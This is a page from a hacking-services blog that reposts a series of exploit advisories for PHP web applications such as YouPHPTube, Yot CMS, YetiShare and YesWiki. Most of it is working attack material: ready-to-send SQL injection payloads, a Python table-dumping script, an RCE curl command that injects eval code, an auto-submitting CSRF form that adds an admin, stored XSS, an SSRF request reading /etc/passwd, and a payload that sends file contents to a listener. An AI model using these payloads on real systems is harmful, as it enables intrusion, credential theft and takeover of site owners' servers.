Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863118188

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: YouPHPTube <= 7.8 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-01-31
# Vendor Homepage: https://www.youphptube.com/
# Software Link : https://www.youphptube.com/
# Tested Version: 7.8
# Tested on:  Windows 7, 10 using XAMPP

# Vulnerability Type: LFI + Path Traversal

CVSS v3: 7.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-829, CWE-22

Vulnerability description: YouPHPTube v7.8 allows unauthenticated directory
traversal and Local File Inclusion through the parameter in an
/?lang=PATH+TRAVERSAL+FILE (without php) GET request because of an
include_once in locale/function.php page.

Proof of concept:

To detect: http://localhost/youphptube/index.php?lang=)

An error is generated:

Warning: preg_grep(): Compilation failed: unmatched parentheses at offset 0
in C:\xampp\htdocs\YouPHPTube\locale\function.php on line 47

In function.php page, we can see:

// filter some security here
if (!empty($_GET['lang'])) {
    $_GET['lang'] = str_replace(array("'", '"', """, "&#039;"),
array('', '', '', ''), xss_esc($_GET['lang']));
}

if (empty($_SESSION['language'])) {
    $_SESSION['language'] = $config->getLanguage();
}
if (!empty($_GET['lang'])) {
    $_GET['lang'] = strip_tags($_GET['lang']);
    $_SESSION['language'] = $_GET['lang'];
}
@include_once
"{$global['systemRootPath']}locale/{$_SESSION['language']}.php";


The parameter "lang" can be modified and load a php file in the server.


In Document root: /phpinfo.php with this content:

<?php echo phpinfo(); ?>


To Get phpinfo.php: http://127.0.0.1/youphptube/?lang=../../phpinfo

Note: phpinfo without ".php".

The new Path is:
@include_once "{$global['systemRootPath']}locale/../../phpinfo.php";

And you can see the PHP information into the browser.



# Vulnerability Type: reflected Cross-Site Scripting (XSS)

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: YouPHPTube 7.8 and before, does not sufficiently
encode user-controlled inputs, resulting in a reflected Cross-Site
Scripting (XSS) vulnerability via the
/<YouPHPTube_path_directory>/signup?redirectUri=<XSS>, in redirectUri
parameter.

Proof of concept:

http://localhost/
<YouPHPTube_path_directory>/signup?redirectUri='"()%26%25<ScRipt>alert(1)</ScRipt>
HireHackking 
# Exploit Title: YouPHPTube <= 7.4 - Remote Code Execution
# Google Dork: intext:"Powered by YouPHPTube"
# Date: 29 August 2019
# Exploit Author: Damian Ebelties (https://zerodays.lol/)
# Vendor Homepage: https://www.youphptube.com/
# Version: <= 7.4
# Tested on: Ubuntu 18.04.1

YouPHPTube before 7.5 does no checks at all if you wanna generate a new
config file. We can use this to generate our own config file with our
own (malicious) code.

All you need is a MySQL server that allows remote connections.

Fixed by the following commit:

    https://github.com/YouPHPTube/YouPHPTube/commit/b32b410c9191c3c5db888514c29d7921f124d883

Proof-of-Concept:

    # Run this command (with your own data replaced)
    # Then visit https://domain.tld/?zerodayslol=phpinfo() for code execution!
    curl -s "https://domain.tld/install/checkConfiguration.php" --data "contactEmail=rce@zerodays.lol&createTables=2&mainLanguage=RCE&salt=';eval(\$_REQUEST['zerodayslol']);echo '&systemAdminPass=zerodays.LOL&systemRootPath=./&webSiteRootURL=<URL>&webSiteTitle=Zerodays.lol&databaseHost=<DB_HOST>&databaseName=<DB_NAME>&databasePass=<DB_PASS>&databasePort=<DB_PORT>&databaseUser=<DB_USER>"
HireHackking 
# Exploit Title: YouPHPTube < 7.3 SQL Injection
# Google Dork: /
# Date: 19.08.2019
# Exploit Author: Fabian Mosch, r-tec IT Security GmbH
# Vendor Homepage: https://www.youphptube.com/
# Software Link: https://github.com/YouPHPTube/YouPHPTube
# Version: < 7.3
# Tested on: Linux/Windows
# CVE : CVE-2019-14430

The parameters "User" as well as "pass" of the user registration function are vulnerable to SQL injection vulnerabilities. By submitting an HTTP POST request to the URL "/objects/userCreate.json.php" an attacker can access the database and read the hashed credentials of an administrator for example.

Example Request:

POST /objects/userCreate.json.php HTTP/1.1
Host: vulnerablehost.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
[SomeHeaders and Cookies]

user=tes'INJECTHERE&pass=test'INJECTHERE &email=test%40example.com&name=test&captcha=xxxxx

Methods for DB-Extraction are:


- Boolean-based blind

- Error-based

- AND/OR time-based blind


The vulnerability was fixed with this commit:
https://github.com/YouPHPTube/YouPHPTube/commit/891843d547f7db5639925a67b7f2fd66721f703a
HireHackking 
# Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass
# Date: 2021-10-02
# Exploit Author: Jordan Glover
# Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10 + XAMPP v3.3.0

Steps-To-Reproduce:
Step 1 Go to the admin panel http://localhost/bsenordering/admin/login.php
Step 2 – Enter the default admin username janobe and enter password test
Step 3 – Click on Sign in and capture the request in the Burp Suite
Step 4 – Change the user_email to janobe' or '1'='1 
Step 5 – Click forward and now you will be logged in as an admin.

POC 

POST /bsenordering/admin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Origin: http://localhost
Connection: close
Referer: http://localhost/bsenordering/admin/login.php
Cookie: PHPSESSID=him428198e798r23eagi9mapjk
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

user_email=janobe' or '1'='1&user_pass=test&btnLogin=
HireHackking 
# Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)
# Date: 2021-10-03
# Exploit Author: Jordan Glover
# Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10 + XAMPP v3.3.0

Young Entrepreneur E-Negosyo System 1.0 suffers from a Cross Site Scripting (XSS) vulnerability.

Step 1 - Create a new product to sell - http://localhost/bsenordering/admin/products/index.php?view=add
Step 2 - Fill out all required fields to create a new product. Input a payload in the product description field - <script>alert(document.cookie)</script>
Step 3 - Save the product.

The stored XSS triggers for all users that navigate to the home page.

POC

POST /bsenordering/admin/products/controller.php?action=add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------375756297829058981022228786743
Content-Length: 1203
Origin: http://localhost
Connection: close
Referer: http://localhost/bsenordering/admin/products/index.php?view=add
Cookie: PHPSESSID=794albocs4b1st3m9hsileorpg
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="OWNERNAME"

Test
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="OWNERPHONE"

0000000000
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PRODESC"

<script>alert(document.cookie)</script>
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="CATEGORY"

3
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="ORIGINALPRICE"

100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PROPRICE"

100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PROQTY"

100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="save"


-----------------------------375756297829058981022228786743--
HireHackking 
# Exploit Title: Yot CMS 3.3.1 - 'aid' SQL Injection
# Dork: N/A
# Date: 2018-11-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://yot.sourceforge.io/
# Software Link: https://ayera.dl.sourceforge.net/project/yot/Yot%203.3.1.zip
# Version: 3.3.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/index.php?page=articles&op=art&aid=[SQL]
# 
GET /[PATH]/index.php?page=articles&op=art&aid=1++uniON+SElEcT++++0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(selEct(0)frOm(information_schema.COlumns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),%200x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)--+- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 01 Nov 2018 23:21:17 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=eatkahgi05mbjht042ipvtifp5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

# POC: 
# 2)
# http://localhost/[PATH]/index.php?page=articles&op=cat&cid=[SQL]
# 
GET /[PATH]/index.php?page=articles&op=cat&cid=1++uniON+SElEcT++++0x496873616e%2c(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(selEct(0)frOm(information_schema.COlumns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),%200x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)--+- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=eatkahgi05mbjht042ipvtifp5
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 01 Nov 2018 23:32:28 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
HireHackking 
# Exploit title: Yosoro 1.0.4 - Remote Code Execution
# Date: 2018-05-29
# Exploit Author: Carlo Pelliccioni
# Vendor homepage: https://yosoro.coolecho.net/
# Software link: https://github.com/IceEnd/Yosoro/releases/download/v1.0.4/Yosoro-darwin-x64-1.0.4.zip
# Version: 1.0.4
# Tested on: MacOS 10.13.4
# CVE: CVE-2018-11522
#  _  _            _    _    _             ___                      _  _         
# | || | __ _  __ | |__| |_ (_)__ __ ___  / __| ___  __  _  _  _ _ (_)| |_  _  _ 
# | __ |/ _` |/ _|| / /|  _|| |\ V // -_) \__ \/ -_)/ _|| || || '_|| ||  _|| || |
# |_||_|\__,_|\__||_\_\ \__||_| \_/ \___| |___/\___|\__| \_,_||_|  |_| \__| \_, |

# Remote Code Execution (CVE-2018-11522)
# Payload: 

<webview src="data:text/html,<script>var read = require('fs').readFileSync('/etc/passwd', 'utf-8'); document.location='http://127.0.0.1:8089/'+btoa(read); </script>" nodeintegration></webview>
HireHackking 
<!--
# Exploit Title: Yona CMS <= 1.3.x Remote Admin Add CSRF Exploit
# Exploit Author: s0nk3y
# Google Dork: -
# Date: 21/06/2016
# Vendor Homepage: http://yonacms.com
# Software Link: https://github.com/oleksandr-torosh/yona-cms/
# Version: 1.3.x
# Tested on: Ubuntu 16.04

Yona CMS is vulnerable to CSRF attack (No CSRF token in place) meaning
that if an admin user can be tricked to visit a crafted URL created by
attacker (via spear phishing/social engineering), a form will be submitted
to (http://localhost/admin/admin-user/add) that will add a
new user as administrator.
Once exploited, the attacker can login to the admin panel (
http://localhost/admin)
using the username and the password he posted in the form.

CSRF PoC Code
=============
-->

<form method="post" action="http://localhost/admin/admin-user/add">   
<input type="hidden" name="login" value="attacker"/>
<input type="hidden" name="email" value="attacker@email.com"/>
<input type="hidden" name="name" value="attacker"/>
<input type="hidden" name="role" value="admin"/>
<input type="hidden" name="password" value="attackerPassword"/>
<input type="hidden" name="active"/>
</form>
<script>
document.forms[0].submit();
</script>
HireHackking 
# # # # # 
# Exploit Title: Yoga Class Script 1.0 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/yoga-class-script/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/list?city=[SQL]&main_search=
# 
# -'+/*!01111UNION*/+/*!01111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search=
# 
# http://server/list?city=-'+/*!01111UNION*/+/*!01111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search=
# 
# # # # #
HireHackking 
# Exploit Title: Yoga Class Registration System v1.0 - Multiple SQLi
# Date: 19/03/2023
# Exploit Author: Abdulhakim Öner
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ycrs.zip
# Version: 1.0
# Tested on: Windows, Linux

## Description 
A Blind SQL injection vulnerability in the "cid" parameter in Online Pizza Ordering System allows remote unauthenticated attackers to dump database through arbitrary SQL commands. 

## Request PoC
```
GET /php-ycrs/?p=yclasses%2fregistration&cid=2' HTTP/1.1
Host: 192.168.1.101
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.101/php-ycrs/?p=yclasses%2fview_class&id=2
Cookie: PHPSESSID=1pbq6ushdtnf0o5oqhdcv81l4v

```

This request causes a Fatal Error in the webapp. Adding "'%2b(select*from(select(sleep(10)))a)%2b'" to the end of "cid" parameter, the response to request was 200 status code with message of OK, but 10 seconds later, which indicates that our sleep 10 command works. 

```
GET /php-ycrs/?p=yclasses%2fregistration&cid=2'%2b(select*from(select(sleep(20)))a)%2b' HTTP/1.1
Host: 192.168.1.101
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.101/php-ycrs/?p=yclasses%2fview_class&id=2
Cookie: PHPSESSID=1pbq6ushdtnf0o5oqhdcv81l4v

```

## Exploit with sqlmap
Save the request from burp to file 
```
sqlmap -r sqli.txt -p 'cid' --batch --dbs --level=3 --risk=2

---snip---
GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 302 HTTP(s) requests:
---
Parameter: cid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=yclasses/registration&cid=2' AND 5068=5068-- JfDq

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: p=yclasses/registration&cid=2' AND (SELECT 3800 FROM(SELECT COUNT(*),CONCAT(0x717a7a6b71,(SELECT (ELT(3800=3800,1))),0x7170787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hjLV

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=yclasses/registration&cid=2' AND (SELECT 6005 FROM (SELECT(SLEEP(5)))kQyZ)-- btnY
---
[16:00:10] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.54, PHP 8.2.0
---snip---
```

## The "id" parameter in "/php-ycrs/?p=yclasses%2fview_class&id=1" and "/php-ycrs/admin/?page=classes%2fmanage_class&id=2" are also vulnerable. It can be exploited in the same way.
HireHackking 
# # # # # 
# Vulnerability: SQL Injection
# Date: 18.01.2017
# Vendor Homepage: http://www.scriptgiant.com/
# Script Name: Yoga and Fitness Website Script
# Script Buy Now: http://www.popularclones.com/products/Yoga-and-Fitness-Website
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/promo_classes.php?cid=[SQL]
# http://localhost/[PATH]/style.php?s=[SQL]
# http://localhost/[PATH]/teacherindi.php?t=[SQL]
# E.t.c.... Other files, too. SQL There are security vulnerabilities.
# # # # #
HireHackking 
source: https://www.securityfocus.com/bid/55685/info

An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and to run it in the context of the web server process.

YingZhiPython 1.9 is vulnerable; other versions may also be affected. 

ftp://www.example.com/../../../../../../../private/etc/passwd
HireHackking 
# Title: YetiShare File Hosting Script 5.1.0 - 'url' Server-Side Request Forgery
# Date: 09.01.2021
# Author: Numan Türle
# Vendor Homepage: https://mfscripts.com
# Software Link: https://yetishare.com
# Version: v5.1.0
# Tested on: YetiShare - File Hosting Script v5.1.0, Php Version : 7.4


Summary
---------
YetiShare is script the file hosting. This script has remote file upload feature.
Since sufficient security measures are not taken in the remote file upload area, 
SSRF vulnerability available.

Description
---------
When a new upload request is received by the user, the following function block 
is called first.
app/tasks/process_remote_file_downloads.cron.php
------------------------------------------------
        // include plugin code
        $url = $urlDownloadData['url'];
        $params = PluginHelper::includeAppends('url_upload_handler', array(
            'url' => $url,
            'rowId' => 0,
            'urlDownloadData' => $urlDownloadData,
            )
        );
        $url = $params['url'];

        // start download
        $upload_handler->handleRemoteUrlUpload($url);
------------------------------------------------

The url parameter received as input from the user in the called function blog is 
sent to the "handleRemoteUrlUpload" function. 

/Users/numan/Desktop/file-hosting-script-v5.0.0-beta/app/services/
Uploader.class.php
------------------------------------------------------------------
public function handleRemoteUrlUpload($url, $rowId = 0) {
        .....
        $remoteFileDetails = $this->getRemoteFileDetails($url);
        $remoteFilesize = (int) $remoteFileDetails['bytes'];
        if ($remoteFilesize > $this->options['max_file_size']) {
            .....ERROR MSG
        }
        else {
            // look for real filename if passed in headers
            if (strlen($remoteFileDetails['real_filename'])) {
                $realFilename = trim(current(explode(';', 
                $remoteFileDetails['real_filename'])));
                if (strlen($realFilename)) {
                    $this->fileUpload->name = $realFilename;
                }
            }

            // try to get the file locally
            $localFile = $this->downloadRemoteFile($url, true);
------------------------------------------------------------------

In this function that is called, the details of the file are taken first and if 
the bytes is not larger than the max_file_size, the "downloadRemoteFile" 
function will go to the download.

------------------------------------------------------------------
public function getRemoteFileDetails($url) {
      .....
            $execute = curl_exec($ch);

            // check if any error occured
            if (!curl_errno($ch)) {
                $rs['bytes'] = (int) curl_getinfo($ch, 
                CURLINFO_CONTENT_LENGTH_DOWNLOAD);
.....
------------------------------------------------------------------
------------------------------------------------------------------
public function downloadRemoteFile($url, $streamResponse = false) {
        .....
        // use curl
        if (function_exists('curl_init')) {
            // get file via curl
            $fp = fopen($tmpFullPath, 'w+');
            if ($ch === null) {
                $ch = curl_init();
            }

            curl_setopt($ch, CURLOPT_URL, $url);
            .....
            curl_setopt($ch, CURLOPT_FILE, $fp);
            if (curl_exec($ch) === false) {
                // log error
                LogHelper::error('Failed getting url. Error: ' 
                . curl_error($ch) . ' (' . $url . ')');
                return false;
            }
            $status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);
            fclose($fp);
            .....
        }
.....
------------------------------------------------------------------




POC
---------

GET /ajax/url_upload_handler?csaKey1=CSAKEY1&csaKey2=CSAKEY2&rowId=0&url=file:///etc/passwd&folderId=-1 HTTP/1.1
Host: target.com
Connection: close
Accept: */*
Cookie: HERE_COOKIE



Response
---------
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Connection: close
Pragma: no-cache
Content-Length: XXX

...<script>parent.updateUrlProgress({"done":{"name":"passwd","size":2082,
"type":"text\/plain; charset=us-ascii","error":null,"rowId":0,
"requestUrl":"file:\/\/\/etc\/passwd","url":....



..........
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
HireHackking 
# Exploit Title: YetiForce CRM < 3.1  - Persistant XSS Vulnerability
# Exploit Author: David Silveiro 
# Exploit Author Github: github.com/davidsilveiro
# Exploit Author Twitter: twitter.com/david_silveiro 
# Vendor Homepage: https://yetiforce.com/
# Software Link: http://sourceforge.net/projects/yetiforce/
# Date: Fixed on 20th June 2016

YetiForce CRM was built on a rock-solid Vtiger foundation, but has hundreds of changes that help to accomplish even the most challenging tasks in the simplest way

YetiForce is vulnerable to a stored XSS vulnerability present within a users comment section.

POC:

Within 'Companies & Accounts > Accounts' select your prefered user, and then in the 'Comments' section input;

<img src=x onerror=alert('XSS');>

Either refresh the current page, or navigate back to 'Accounts'
HireHackking 
# Exploit Title: YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection
# Date: 2020-04-25
# Exploit Author: coiffeur
# Vendor Homepage: https://yeswiki.net/
# Software Link: https://yeswiki.net/, https://github.com/YesWiki/yeswiki
# Version: YesWiki cercopitheque < 2020-04-18-1

import sys

import requests

DEBUG = 0


def usage():
    banner = """NAME: YesWiki cercopitheque 2020-04-18-1, SQLi
SYNOPSIS: python sqli_2020.04.18.1.py <URL> [OPTIONS]...
DESCRIPTION:
    -lt, list tables.
    -dt <TABLE>, dump table.
AUTHOR: coiffeur
    """
    print(banner)


def parse(text):
    deli_l = 'ABCAABBCC|'
    deli_r = '|ABCAABBCC'
    if (text.find(deli_l) == -1) or (text.find(deli_r) == -1):
        print('[x] Delimiter not found, please try to switch to a Time Based SQLi')
        exit(-1)
    start = text.find(deli_l) + len(deli_l)
    end = start + text[start::].find(deli_r)
    return text[start:end]


def render(elements):
    print(elements)

def get_count(t_type, table_name=None, column_name=None):
    if t_type == 'table':
        payload = '?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(TABLE_NAME),0x7c,0x414243414142424343) FROM information_schema.tables),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        if r.status_code == 200:
            data = parse(r.text)
    if t_type == 'column':
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(COLUMN_NAME),0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}"),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        data = parse(r.text)
    if t_type == 'element':
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count({column_name}),0x7c,0x414243414142424343) FROM {table_name}),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        data = parse(r.text)
    return int(data)


def list_tables():
    tables_count = get_count(t_type='table')
    print(f'[+] Tables found: {tables_count}')

    tables = []
    for i in range(0, tables_count):
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,TABLE_NAME,0x7c,0x414243414142424343) FROM information_schema.tables LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        if r.status_code == 200:
            talbe = parse(r.text)
            print(f'\t{talbe}')
            tables.append(talbe)
    return tables


def list_columns(table_name):
    columns_count = get_count(t_type='column', table_name=table_name)
    print(f'[+] Columns found: {columns_count}')

    columns = []
    for i in range(0, columns_count):
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,COLUMN_NAME,0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}" LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        if r.status_code == 200:
            column = parse(r.text)
            if DEBUG > 0:
                print(f'\t{column}')
            columns.append(column)
    return columns


def dump_table(name):
    columns = list_columns(name)
    elements = [None]*len(columns)
    for i in range(0, len(columns)):
        elements_count = get_count(
            t_type='element', table_name=name, column_name=columns[i])
        if DEBUG > 0:
            print(f'[+] Dumping: {columns[i]} ({elements_count} rows)')
        element = []
        for j in range(0, elements_count):
            payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,{columns[i]},0x7c,0x414243414142424343) FROM {name} LIMIT 1 OFFSET {j}),NULL,NULL,NULL,NULL,NULL-- -'
            if DEBUG > 1:
                print(f'[DEBUG] {payload}')
            r = requests.get(url=f'{sys.argv[1]}{payload}')
            if r.status_code == 200:
                element.append(parse(r.text))
                if DEBUG > 0:
                    print(f'\t{element[-1]}')
        elements[i] = element
    render(elements)
    return elements


def main():
    if len(sys.argv) < 3:
        print(usage())
        exit(-1)

    if sys.argv[2] == '-lt':
        list_tables()

    if sys.argv[2] == '-dt':
        dump_table(sys.argv[3])


if __name__ == "__main__":
    main()
HireHackking 
# Exploit Title: SQL Injection in Yeswiki (Cercopitheque)
# Date: 02/07/2018
# Exploit Author: Mickael BROUTY (@ark1nar) - FIDENS 
# Vendor Homepage: https://yeswiki.net
# Software Link: https://repository.yeswiki.net/cercopitheque/yeswiki-cercopitheque-2018-12-07-1.zip
# Version: Yeswiki Cercopitheque 2018-06-19-1
# Tested on: Kali linux
# CVE : CVE-2018-13045


# POC:
# 1)
# http://localhost/[PATH]/?BaZar&vue=exporter&id=[SQL]
#


Exploitation example:

http://localhost/[PATH]/?BaZar&vue=exporter&id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15#
